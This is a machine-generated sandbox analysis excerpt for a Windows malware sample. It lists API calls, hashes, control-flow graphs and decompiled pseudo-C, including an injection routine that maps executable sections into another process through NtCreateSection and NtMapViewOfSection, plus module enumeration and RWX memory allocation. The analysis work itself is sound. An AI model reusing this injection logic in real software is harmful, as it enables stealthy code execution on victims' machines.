                                                                                                                                    0x004015cd
                                                                                                                                    0x004015d1
                                                                                                                                    0x004015d7
                                                                                                                                    0x004015da
                                                                                                                                    0x004015dc
                                                                                                                                    0x004015df
                                                                                                                                    0x004015e5
                                                                                                                                    0x004015e8
                                                                                                                                    0x004015f6
                                                                                                                                    0x004015f7
                                                                                                                                    0x004015f8
                                                                                                                                    0x004015fa
                                                                                                                                    0x00401600
                                                                                                                                    0x00401623
                                                                                                                                    0x00401626
                                                                                                                                    0x00401629
                                                                                                                                    0x0040162c
                                                                                                                                    0x00401632
                                                                                                                                    0x00401647
                                                                                                                                    0x0040164c
                                                                                                                                    0x0040164f
                                                                                                                                    0x00401652
                                                                                                                                    0x0040166a
                                                                                                                                    0x0040166c
                                                                                                                                    0x0040166f
                                                                                                                                    0x00401688
                                                                                                                                    0x0040168a
                                                                                                                                    0x00401694
                                                                                                                                    0x0040169a
                                                                                                                                    0x004016a0
                                                                                                                                    0x004016a0
                                                                                                                                    0x00401688
                                                                                                                                    0x0040166a
                                                                                                                                    0x004016a3
                                                                                                                                    0x004016af
                                                                                                                                    0x004016b2
                                                                                                                                    0x004016b4
                                                                                                                                    0x004016c9
                                                                                                                                    0x004016cf
                                                                                                                                    0x004016dc
                                                                                                                                    0x004016df
                                                                                                                                    0x004016e2
                                                                                                                                    0x004016fa
                                                                                                                                    0x00401700
                                                                                                                                    0x00401703
                                                                                                                                    0x0040171a
                                                                                                                                    0x0040171c
                                                                                                                                    0x00401722
                                                                                                                                    0x00401727
                                                                                                                                    0x0040172f
                                                                                                                                    0x004017a4
                                                                                                                                    0x004017a5
                                                                                                                                    0x004017b1
                                                                                                                                    0x004017c0
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172b
                                                                                                                                    0x0040172b
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172d
                                                                                                                                    0x0040172d
                                                                                                                                    0x0040172e
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172e
                                                                                                                                    0x0040172b
                                                                                                                                    0x00401727
                                                                                                                                    0x0040171c
                                                                                                                                    0x00000000
                                                                                                                                    0x004016fa
                                                                                                                                    0x004016cf
                                                                                                                                    0x004016c9
                                                                                                                                    0x00401600
                                                                                                                                    0x004018d6
                                                                                                                                    0x00401909
                                                                                                                                    0x00401912

                                                                                                                                    APIs
                                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401615
                                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401642
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401665
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401683
                                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C4
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F5
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401717
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1546783058-0
                                                                                                                                    • Opcode ID: 8bb3de617ba26b69093f1a55f0c70da1e77151e50b2de449b15fd8471af5bca1
                                                                                                                                    • Instruction ID: eba5a94354b6d959a908896b75b9ac4ab9a555b93fbf6af3f2d26d8a5be8b00e
                                                                                                                                    • Opcode Fuzzy Hash: 8bb3de617ba26b69093f1a55f0c70da1e77151e50b2de449b15fd8471af5bca1
                                                                                                                                    • Instruction Fuzzy Hash: 65512875900249BFEF208F91CC48FEFBBB8FF85B00F104159F911AA2A5E6749941CB24
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 157 401584-4015b0 call 401271 164 4015b2 157->164 165 4015b5-4015ba 157->165 164->165 167 4015c0-4015d1 165->167 168 4018d8-4018e0 165->168 171 4018d6 167->171 172 4015d7-401600 167->172 168->165 173 4018e5-401912 call 401271 168->173 171->173 172->171 181 401606-40161d NtDuplicateObject 172->181 181->171 183 401623-401647 NtCreateSection 181->183 185 4016a3-4016c9 NtCreateSection 183->185 186 401649-40166a NtMapViewOfSection 183->186 185->171 189 4016cf-4016d3 185->189 186->185 188 40166c-401688 NtMapViewOfSection 186->188 188->185 191 40168a-4016a0 188->191 189->171 190 4016d9-4016fa NtMapViewOfSection 189->190 190->171 192 401700-40171c NtMapViewOfSection 190->192 191->185 192->171 193 401722 192->193 193->171 195 401722 call 401727 193->195 195->171
                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                    			E00401584(void* __ebx, void* __edx, void* __edi, void* __fp0) {
                                                                                                                                    				void* _t85;
                                                                                                                                    				intOrPtr _t88;
                                                                                                                                    				long _t91;
                                                                                                                                    				void* _t93;
                                                                                                                                    				struct _GUID _t99;
                                                                                                                                    				struct _GUID _t101;
                                                                                                                                    				PVOID* _t103;
                                                                                                                                    				PVOID* _t105;
                                                                                                                                    				PVOID* _t122;
                                                                                                                                    				PVOID* _t124;
                                                                                                                                    				intOrPtr _t130;
                                                                                                                                    				long* _t134;
                                                                                                                                    				long _t177;
                                                                                                                                    				long* _t185;
                                                                                                                                    				intOrPtr* _t187;
                                                                                                                                    				HANDLE* _t188;
                                                                                                                                    				HANDLE* _t189;
                                                                                                                                    				void* _t202;
                                                                                                                                    				void* _t203;
                                                                                                                                    				void* _t205;
                                                                                                                                    				void* _t206;
                                                                                                                                    				void* _t211;
                                                                                                                                    				long _t225;
                                                                                                                                    				void* _t230;
                                                                                                                                    
                                                                                                                                    				_t230 = __fp0;
                                                                                                                                    				_t129 = __ebx - 1;
                                                                                                                                    				_t211 = __ebx - 1;
                                                                                                                                    				_push(0x36c);
                                                                                                                                    				_t206 = _t205 + 4;
                                                                                                                                    				L00401271(_t85, _t129, __edi, _t211);
                                                                                                                                    				_t130 =  *((intOrPtr*)(_t203 + 8));
                                                                                                                                    				_t177 = 0;
                                                                                                                                    				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                                                                                                                                    				if(gs != 0) {
                                                                                                                                    					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                                                                                                                                    				}
                                                                                                                                    				while(1) {
                                                                                                                                    					_t88 =  *((intOrPtr*)(_t130 + 0x48))();
                                                                                                                                    					if(_t88 != 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					 *((intOrPtr*)(_t130 + 0x1c))(0x3e8);
                                                                                                                                    				}
                                                                                                                                    				 *((intOrPtr*)(_t203 - 0x5c)) = _t88;
                                                                                                                                    				_t185 = _t203 - 0x60;
                                                                                                                                    				 *_t185 = _t177;
                                                                                                                                    				 *((intOrPtr*)(_t130 + 0x4c))(_t88, _t185);
                                                                                                                                    				_t91 =  *_t185;
                                                                                                                                    				if(_t91 != 0) {
                                                                                                                                    					_t134 = _t203 - 0x30;
                                                                                                                                    					 *_t134 = _t91;
                                                                                                                                    					_t134[1] = _t177;
                                                                                                                                    					_t187 = _t203 - 0x28;
                                                                                                                                    					 *((intOrPtr*)(_t130 + 0x10))(_t187, 0x18);
                                                                                                                                    					 *_t187 = 0x18;
                                                                                                                                    					_push(_t203 - 0x30);
                                                                                                                                    					_push(_t187);
                                                                                                                                    					_push(0x40);
                                                                                                                                    					_push(_t203 - 0x10);
                                                                                                                                    					if( *((intOrPtr*)(_t130 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t177, _t177, 2) == 0) {
                                                                                                                                    						 *(_t203 - 8) = _t177;
                                                                                                                                    						_t99 = _t203 - 0x50;
                                                                                                                                    						 *(_t99 + 4) = _t177;
                                                                                                                                    						 *_t99 = 0x5000;
                                                                                                                                    						_t188 = _t203 - 0x54;
                                                                                                                                    						if(NtCreateSection(_t188, 6, _t177, _t99, 4, 0x8000000, _t177) == 0) {
                                                                                                                                    							 *_t25 =  *(_t203 - 0x50);
                                                                                                                                    							_t122 = _t203 - 0x44;
                                                                                                                                    							 *_t122 = _t177;
                                                                                                                                    							if(NtMapViewOfSection( *_t188, 0xffffffff, _t122, _t177, _t177, _t177, _t203 - 0x38, 1, _t177, 4) == 0) {
                                                                                                                                    								_t124 = _t203 - 0x3c;
                                                                                                                                    								 *_t124 = _t177;
                                                                                                                                    								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t124, _t177, _t177, _t177, _t203 - 0x38, 1, _t177, 4) == 0) {
                                                                                                                                    									_t202 =  *(_t203 - 0x44);
                                                                                                                                    									 *((intOrPtr*)(_t130 + 0x20))(_t177, _t202, 0x104);
                                                                                                                                    									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                                                                                                                                    									 *(_t203 - 8) =  *(_t203 - 8) + 1;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t101 = _t203 - 0x50;
                                                                                                                                    						 *(_t101 + 4) = _t177;
                                                                                                                                    						 *_t101 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                                                                                                                                    						_t189 = _t203 - 0x58;
                                                                                                                                    						if(NtCreateSection(_t189, 0xe, _t177, _t101, 0x40, 0x8000000, _t177) == 0) {
                                                                                                                                    							while( *(_t203 - 8) != 0) {
                                                                                                                                    								 *_t46 =  *(_t203 - 0x50);
                                                                                                                                    								_t103 = _t203 - 0x48;
                                                                                                                                    								 *_t103 = _t177;
                                                                                                                                    								if(NtMapViewOfSection( *_t189, 0xffffffff, _t103, _t177, _t177, _t177, _t203 - 0x38, 1, _t177, 4) == 0) {
                                                                                                                                    									_t105 = _t203 - 0x40;
                                                                                                                                    									 *_t105 = _t177;
                                                                                                                                    									_t225 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t105, _t177, _t177, _t177, _t203 - 0x38, 1, _t177, 0x20);
                                                                                                                                    									if(_t225 == 0) {
                                                                                                                                    										L19();
                                                                                                                                    										if(_t225 != 0 || _t225 == 0) {
                                                                                                                                    											L23:
                                                                                                                                    											asm("lodsb");
                                                                                                                                    											goto L41;
                                                                                                                                    											asm("loop 0xffffffc7");
                                                                                                                                    											switch(0x4017c8) {
                                                                                                                                    											}
                                                                                                                                    										} else {
                                                                                                                                    											if(_t225 < 0) {
                                                                                                                                    												continue;
                                                                                                                                    											} else {
                                                                                                                                    												asm("cmpsd");
                                                                                                                                    												_t206 = _t206 - 1;
                                                                                                                                    												goto L23;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								goto L61;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L61:
                                                                                                                                    				_t93 = L00401271(0x15a2, _t130, _t177, _t229);
                                                                                                                                    				return _t93;
                                                                                                                                    			}



























                                                                                                                                    0x00401584
                                                                                                                                    0x00401584
                                                                                                                                    0x00401584
                                                                                                                                    0x0040158b
                                                                                                                                    0x00401593
                                                                                                                                    0x0040159d
                                                                                                                                    0x004015a2
                                                                                                                                    0x004015a5
                                                                                                                                    0x004015a7
                                                                                                                                    0x004015b0
                                                                                                                                    0x004015b2
                                                                                                                                    0x004015b2
                                                                                                                                    0x004015b5
                                                                                                                                    0x004015b5
                                                                                                                                    0x004015ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004018dd
                                                                                                                                    0x004018dd
                                                                                                                                    0x004015c0
                                                                                                                                    0x004015c3
                                                                                                                                    0x004015c6
                                                                                                                                    0x004015ca
                                                                                                                                    0x004015cd
                                                                                                                                    0x004015d1
                                                                                                                                    0x004015d7
                                                                                                                                    0x004015da
                                                                                                                                    0x004015dc
                                                                                                                                    0x004015df
                                                                                                                                    0x004015e5
                                                                                                                                    0x004015e8
                                                                                                                                    0x004015f6
                                                                                                                                    0x004015f7
                                                                                                                                    0x004015f8
                                                                                                                                    0x004015fa
                                                                                                                                    0x00401600
                                                                                                                                    0x00401623
                                                                                                                                    0x00401626
                                                                                                                                    0x00401629
                                                                                                                                    0x0040162c
                                                                                                                                    0x00401632
                                                                                                                                    0x00401647
                                                                                                                                    0x0040164c
                                                                                                                                    0x0040164f
                                                                                                                                    0x00401652
                                                                                                                                    0x0040166a
                                                                                                                                    0x0040166c
                                                                                                                                    0x0040166f
                                                                                                                                    0x00401688
                                                                                                                                    0x0040168a
                                                                                                                                    0x00401694
                                                                                                                                    0x0040169a
                                                                                                                                    0x004016a0
                                                                                                                                    0x004016a0
                                                                                                                                    0x00401688
                                                                                                                                    0x0040166a
                                                                                                                                    0x004016a3
                                                                                                                                    0x004016af
                                                                                                                                    0x004016b2
                                                                                                                                    0x004016b4
                                                                                                                                    0x004016c9
                                                                                                                                    0x004016cf
                                                                                                                                    0x004016dc
                                                                                                                                    0x004016df
                                                                                                                                    0x004016e2
                                                                                                                                    0x004016fa
                                                                                                                                    0x00401700
                                                                                                                                    0x00401703
                                                                                                                                    0x0040171a
                                                                                                                                    0x0040171c
                                                                                                                                    0x00401722
                                                                                                                                    0x00401727
                                                                                                                                    0x0040172f
                                                                                                                                    0x004017a4
                                                                                                                                    0x004017a5
                                                                                                                                    0x004017b1
                                                                                                                                    0x004017c0
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172b
                                                                                                                                    0x0040172b
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172d
                                                                                                                                    0x0040172d
                                                                                                                                    0x0040172e
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172e
                                                                                                                                    0x0040172b
                                                                                                                                    0x00401727
                                                                                                                                    0x0040171c
                                                                                                                                    0x00000000
                                                                                                                                    0x004016fa
                                                                                                                                    0x004016cf
                                                                                                                                    0x004016c9
                                                                                                                                    0x00401600
                                                                                                                                    0x004018d6
                                                                                                                                    0x00401909
                                                                                                                                    0x00401912

                                                                                                                                    APIs
                                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401615
                                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401642
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401665
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401683
                                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C4
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F5
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401717
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1546783058-0
                                                                                                                                    • Opcode ID: e80f536caf152bf3e94cc0c71f5de3aa1a25313e1634a9dc855d69bf66b71934
                                                                                                                                    • Instruction ID: ff4589d9dd45cbe131ca404f5a1a7b84b96daa50389d3937c11961242829b966
                                                                                                                                    • Opcode Fuzzy Hash: e80f536caf152bf3e94cc0c71f5de3aa1a25313e1634a9dc855d69bf66b71934
                                                                                                                                    • Instruction Fuzzy Hash: 3F51FB75900209BFEB209F91CC48FAF7BB8FF85B10F104159F911BA2A5E6759945CB24
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 196 401727 197 401729 196->197 198 40172f-401742 196->198 197->198 200 40172b 197->200 201 401746-401775 198->201 202 401739-40173f 198->202 203 40172d-40172e 200->203 204 4016cf-4016d3 200->204 222 401778-4017b1 201->222 202->201 203->198 205 4018d6-401912 call 401271 204->205 206 4016d9-4016fa NtMapViewOfSection 204->206 206->205 208 401700-40171c NtMapViewOfSection 206->208 208->205 211 401722 208->211 211->205 215 401722 call 401727 211->215 215->205 235 4017b3-4017dc 222->235 240 4017e6 235->240 241 4017de-4017e4 235->241 242 4017ec-4017f2 240->242 241->242 243 401802-401806 242->243 244 4017f4-401800 242->244 243->242 245 401808-40180d 243->245 244->243 246 401875-401884 245->246 247 40180f call 401814 245->247 248 401887-40188a 246->248 250 4018b4-4018cd 248->250 251 40188c-401896 248->251 250->205 252 401899-4018a2 251->252 253 4018b0 252->253 254 4018a4-4018ae 252->254 253->252 255 4018b2 253->255 254->253 255->248
                                                                                                                                    APIs
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F5
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401717
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: SectionView
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1323581903-0
                                                                                                                                    • Opcode ID: b3269723936a826867743af8648194db1896da90316e4de967469b083faf0333
                                                                                                                                    • Instruction ID: 14111f5365361c6cb25e6e8641aff9d84a81222d0f78e87a8274a0a0a7f535ba
                                                                                                                                    • Opcode Fuzzy Hash: b3269723936a826867743af8648194db1896da90316e4de967469b083faf0333
                                                                                                                                    • Instruction Fuzzy Hash: 22519136904204EBDB259A55CC48FBA77B5EF84704F24813BE842772F0D67C6A42E75B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 256 8c6118-8c6131 257 8c6133-8c6135 256->257 258 8c613c-8c6148 CreateToolhelp32Snapshot 257->258 259 8c6137 257->259 260 8c6158-8c6165 Module32First 258->260 261 8c614a-8c6150 258->261 259->258 262 8c616e-8c6176 260->262 263 8c6167-8c6168 call 8c5dd7 260->263 261->260 267 8c6152-8c6156 261->267 268 8c616d 263->268 267->257 267->260 268->262
                                                                                                                                    APIs
                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008C6140
                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 008C6160
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.431462831.00000000008C1000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C1000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_8c1000_file.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3833638111-0
                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                    • Instruction ID: 5a89ed4c5de9682186af158db0a19821d21b0835f6d66d5822757d9e1e8c99e0
                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                    • Instruction Fuzzy Hash: DEF0C2311007156BD7203AB8988CF6EB6F8FF49322F14013DF643D10C1EB70E8454A61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 269 411add-411aec 271 411af2-411af5 269->271 272 411aee-411af1 269->272 273 411b05-411b0e call 40afa5 271->273 274 411af7-411afc 271->274 277 411b13-411b18 273->277 274->274 275 411afe-411b03 274->275 275->273 275->274 278 411b27-411b32 call 40ac40 277->278 279 411b1a-411b26 277->279 278->279
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __malloc_crt
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3464615804-0
                                                                                                                                    • Opcode ID: 731ae221d522d1829f90be8e66cf0c57e854b82c6117d9376517a23a72dc31e0
                                                                                                                                    • Instruction ID: 0158c16504b636b60faab7b61812619d02d963863c8914f32b28e4f0571d7b9d
                                                                                                                                    • Opcode Fuzzy Hash: 731ae221d522d1829f90be8e66cf0c57e854b82c6117d9376517a23a72dc31e0
                                                                                                                                    • Instruction Fuzzy Hash: 01F0E9765051215ED62477343C048FB1A28DEDB36A312443BF692C3260F67C4CC282A9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 283 40de13-40de35 HeapCreate 284 40de37-40de38 283->284 285 40de39-40de42 283->285
                                                                                                                                    APIs
                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040DE28
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 10892065-0
                                                                                                                                    • Opcode ID: a2b101a28789764eb40b95f135f41b8d2e6f6a6968118764ef59ded259d78316
                                                                                                                                    • Instruction ID: ae4525f2cfea8fc376d21e11f68eadfb20afcadbeb3c1daa6a2e3ce4bafaa07a
                                                                                                                                    • Opcode Fuzzy Hash: a2b101a28789764eb40b95f135f41b8d2e6f6a6968118764ef59ded259d78316
                                                                                                                                    • Instruction Fuzzy Hash: 4DD05E769503056EDB009FB0BC08B623BDC9798795F108436BD1DDA190F774C540D654
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 286 40d857-40d859 call 40d7e5 288 40d85e-40d85f 286->288
                                                                                                                                    APIs
                                                                                                                                    • __encode_pointer.LIBCMT ref: 0040D859
                                                                                                                                      • Part of subcall function 0040D7E5: RtlEncodePointer.NTDLL(00000000,?,0040D85E,00000000,004182D3,0058C2E8,00000000,00000314,?,00410358,0058C2E8,004026D0,00012010), ref: 0040D84C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EncodePointer__encode_pointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4150071819-0
                                                                                                                                    • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                    • Instruction ID: 526acb43ca5c929373e9600a2b443946136a858195d47eae16962552b0376426
                                                                                                                                    • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 289 401915-401967 call 401271 Sleep call 40149e 300 401976-40197c 289->300 301 401969-401971 call 40156b 289->301 304 401982-401988 300->304 305 40198c 300->305 301->300 306 40198f-4019a8 call 401271 304->306 305->304 305->306
                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                    			E00401915(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				char _v8;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* _t11;
                                                                                                                                    				void* _t13;
                                                                                                                                    				void* _t16;
                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                    				void* _t20;
                                                                                                                                    				void* _t21;
                                                                                                                                    
                                                                                                                                    				_t24 = __eflags;
                                                                                                                                    				_push(0x5a);
                                                                                                                                    				L00401271(0x194a, _t16, _t21, __eflags);
                                                                                                                                    				_t17 = _a4;
                                                                                                                                    				Sleep(0x1388);
                                                                                                                                    				_push( &_v8);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_t17); // executed
                                                                                                                                    				_t11 = E0040149E(_t20, _t24); // executed
                                                                                                                                    				_t25 = _t11;
                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                    					E0040156B(_t20, _t25, __fp0, _t17, _t11, _v8, _a16); // executed
                                                                                                                                    				}
                                                                                                                                    				 *_t17(0xffffffff, 0);
                                                                                                                                    				_t13 = 0x194a;
                                                                                                                                    				_push(0x5a);
                                                                                                                                    				return L00401271(_t13, _t17, _t21, _t25);
                                                                                                                                    			}












                                                                                                                                    0x00401915
                                                                                                                                    0x00401936
                                                                                                                                    0x00401945
                                                                                                                                    0x0040194a
                                                                                                                                    0x00401952
                                                                                                                                    0x00401958
                                                                                                                                    0x00401959
                                                                                                                                    0x0040195c
                                                                                                                                    0x0040195f
                                                                                                                                    0x00401960
                                                                                                                                    0x00401965
                                                                                                                                    0x00401967
                                                                                                                                    0x00401971
                                                                                                                                    0x00401971
                                                                                                                                    0x0040197a
                                                                                                                                    0x00401987
                                                                                                                                    0x00401995
                                                                                                                                    0x004019a8

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 00401952
                                                                                                                                      • Part of subcall function 0040156B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401615
                                                                                                                                      • Part of subcall function 0040156B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401642
                                                                                                                                      • Part of subcall function 0040156B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401665
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1885482327-0
                                                                                                                                    • Opcode ID: 8d7522ae025c59350a8340f22a2b8cba072d69a72e0f694a0a7740aa560291c7
                                                                                                                                    • Instruction ID: 2a8389aefedc19a0c504b98736b9e0000cd3886a04144bd02a53e168a9e3d464
                                                                                                                                    • Opcode Fuzzy Hash: 8d7522ae025c59350a8340f22a2b8cba072d69a72e0f694a0a7740aa560291c7
                                                                                                                                    • Instruction Fuzzy Hash: 7001A2B5208204F7EB006A949C61EBF3628AB01761F204037FA17B90F1D57C8A13E72F
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 312 8c5dd7-8c5e11 call 8c60ea 315 8c5e5f 312->315 316 8c5e13-8c5e46 VirtualAlloc call 8c5e64 312->316 315->315 318 8c5e4b-8c5e5d 316->318 318->315
                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008C5E28
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.431462831.00000000008C1000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C1000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_8c1000_file.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
